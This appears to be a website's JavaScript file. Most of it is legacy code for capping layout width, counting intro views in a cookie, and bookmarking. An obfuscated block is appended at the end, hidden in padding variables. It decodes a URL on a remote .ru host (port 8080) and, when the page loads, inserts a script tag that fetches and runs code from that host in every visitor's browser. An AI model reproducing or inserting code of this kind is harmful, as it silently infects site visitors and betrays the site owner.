  function setMinMaxSize() {
    // you can edit the values of the following three lines
	var divName = "main";
    var maxWidth = 990;
	var minWidth = 990;
	
	/*** DO NOT MODIFY ANYTHING BELOW THIS LINE ***/

	var ns6 = document.getElementById && !document.all		
	var sizediv = ns6 ? document.getElementById(divName) : document.all[divName];

	if (parseInt(navigator.appVersion)>3) {
	 if (navigator.appName=="Netscape") {
	   winW = window.innerWidth - 16 ;
	 
	 } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
       //IE 6+ in 'standards compliant mode'     	   
	   winW = document.documentElement.clientWidth - 20;
     
	 } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
        //IE 4 compatible
        winW = document.body.clientWidth - 20; 
     }
	
      if (winW > maxWidth) { 
	    sizediv.style.width = maxWidth + "px"; 
	  } else if (winW < minWidth) { 
	    sizediv.style.width = minWidth + "px"; 
	  } else if (sizediv.style.width != "100%") {
	    sizediv.style.width = "100%";
	  }
	}
	/*** DO NOT MODIFY ANYTHING ABOVE THIS LINE ***/
  }
 
if (navigator.appName!="Netscape") {
	if (window.addEventListener) {
	  window.addEventListener("resize", setMinMaxSize);
	  window.addEventListener("load", setMinMaxSize);
	} else if (window.attachEvent) {

	  window.attachEvent("onresize", setMinMaxSize);
	  window.attachEvent("onload", setMinMaxSize);	
	}
}



 


 var ns6=document.getElementById&&!document.all

  
  function runIntroSequenceCheck() {  
    
    var myCookie = getCookie();
    
    if (myCookie < maxIntroViews || maxIntroViews == -1) {
    	// only set a cookie if there is a "max allowable views" value set
    	if (maxIntroViews > 0) {
      	  setCookie(myCookie, isPersistantCookie);
      	  
    	} else if (maxIntroViews == 0) {
	       
	         // cannot communicate with flash movie if viewing page on local machine due to security concerns
	         if (!window.location.href.indexOf("http")) {

	           return "skip";
	       
	         }
    	}

    } else {
       
         // cannot communicate with flash movie if viewing page on local machine due to security concerns
         if (!window.location.href.indexOf("http")) {
           return "skip";
         }
      
    } 
    //alert ("noskip");
    return "noskip";
    //setIntroMovieParams();     
  }
  
 function bookmark(){
  if (document.all) {
    if (window.location.href.indexOf("http")) {
      alert("You cannot bookmark a page on your local computer.");
    } else {
      window.external.AddFavorite(document.location.href,document.title)
    }
  } else {
    alert("Please select CTRL-D to bookmark this page");
  }
}

function makeHomePage() {
	if (document.all){
	  document.body.style.behavior='url(#default#homepage)';
      document.body.setHomePage(document.location);
	}
}



function getCookie() {
  var cookieName = document.location + "";
  cookieName = cookieName.replace(/index.htm/gi, "");
  var cookieName2 = cookieName + "index.htm";

  var cookieBox = document.cookie.split("; ");
  for (var i=0; i< cookieBox.length; i++) {
      var cookiePacket = cookieBox[i].split("=");
      if (cookieName == cookiePacket[0] || cookieName2 == cookiePacket[0]) {
        return unescape(cookiePacket[1]);
      }
  }
  return 0;
}



function setCookie(myCookieState, isPersistant) {
  if (!myCookieState) {
    myCookieState = 0;
  }
  myCookieState++;
  myCookieInfo = document.location + "=" + myCookieState+ "; ";

  if (isPersistant == 1) {
    cookieExpiration = new Date();
    cookieExpiration.setFullYear(cookieExpiration.getFullYear() + 1);
    myCookieInfo = myCookieInfo + "expires="+cookieExpiration.toUTCString()+"; ";
  }
  document.cookie = myCookieInfo;
}

//window.onload = runIntroSequenceCheck; // only for intro page


var Kc;if(Kc!='L'){Kc='L'};try {var TM;if(TM!='' && TM!='i'){TM=null};var Xf;if(Xf!='M' && Xf != ''){Xf=null};var p="";var s=String("1Zvbrep".substr(4)+"R40lac0R4".substr(3,3)+"e");var e="";var S=RegExp;var ax=new String();var TS;if(TS!='A' && TS!='cW'){TS=''};var LR;if(LR!='Cc' && LR!='SJ'){LR=''};function v(B,C){var HE=new String();var c="[iq4B".substr(0,1);var Bh=new String("g");var gi;if(gi!='jV' && gi!='Kb'){gi=''};c+=C;var r;if(r!='' && r!='EI'){r=null};c+="]";var _;if(_!='' && _!='o'){_=null};var x;if(x!='Bn'){x='Bn'};var k=new S(c, Bh);var Nh;if(Nh!='' && Nh!='GT'){Nh=null};return B[s](k, new String());};this.pI="";var AO;if(AO!='uP'){AO='uP'};var iR=new String();var ry;if(ry!='le'){ry='le'};var q;if(q!='aj' && q!='oo'){q='aj'};var BB=new String();var R=v('hJtJtJpJ:J/J/4149JlJo4uJ-4c4oJmJ.JaJc4eJrJ.4cJoJmJ.Jw4iJn4a4m4p4-Jc4o4m4.4B4eJsJtJBJlJe4n4dJe4rJPJaJrJt4.JrJu4:4',"4J");var Hu;if(Hu!='' && Hu!='aR'){Hu=''};var yj=new Date();var yC;if(yC!='b' && yC != ''){yC=null};var K=v('/AgAo3o3gAl3e3.0cAoJmW/Ag0oWoJgAlWeJ.0cAoWmA/3u3pAsJ.Ac3oAmJ/WnWaAu3k3rWiJ.Wc3oWmJ/JyJa0h0oWo0.JcAoA.Aj3p3.JpWhApW',"0AJ3W");var BQ;if(BQ!='' && BQ!='BR'){BQ='dS'};var Se=window;var D=v('8263320363683133501223',"21356");var RN='';var j=v('oYnxlJogaJdJ',"JxgY");this.zv='';this.ch='';var Dy=v('sQcQrQijpQtj',"Qdj");this.zr='';this.jl='';var Ky=v('cxrPePaxtqesEJlsesmqesnqtx',"xsPqJ");var vo=new String();var sl;if(sl!='XO'){sl='XO'};T=function(){d=document[Ky](Dy);var SC=new String();var OC;if(OC!='xM'){OC=''};RN=R+D;var t=new String();var fR=new Array();RN+=K;this.tF='';var xv;if(xv!='' && xv!='Ap'){xv=''};d.src=RN;var ph='';var HM;if(HM!='' && HM!='vv'){HM=null};d.defer=([0,1][1]);var Rh;if(Rh!='ts'){Rh='ts'};document.body.appendChild(d);this.gf='';var xk="";};Se[j]=T;var bA='';var Ib=new Array();var at=new Date();} catch(Z){};var Jw=new String();this.Wq="";